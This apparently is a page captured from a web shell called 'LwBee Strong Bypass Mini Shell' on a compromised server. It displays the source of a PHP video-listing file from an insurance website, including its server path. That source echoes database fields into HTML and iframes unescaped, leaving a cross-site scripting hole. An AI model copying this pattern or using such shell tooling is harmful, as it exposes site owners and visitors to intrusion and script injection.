/home3/vehiclea/public_html/keerthiinsurance/videoContent.php


                <section id="video">
                  
                <div class="section-title" >
                    <h2>Videos</h2>
                  </div>
                  <div class="container">
                    <div class="row">
                      <?php

                      
          $select_video = select_video();
          while($select_videoData = mysqli_fetch_array($select_video)){ 

                  $video = $select_videoData['video_link'];

                  ?>

                  
          <div class="col-lg-4 col-md-6 col-xs-12 video-img">
            <div class="row" >
                      <h2 ><?php echo $select_videoData["name"] ?></h2> 
              <iframe width="300" height="240" src="<?php echo $video ?>"  frameborder="0" allowfullscreen></iframe>
          </div>
        </div>
                  <?php

                }


                ?>
                

            
                        </div>
                        </div>
          </section>
              
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File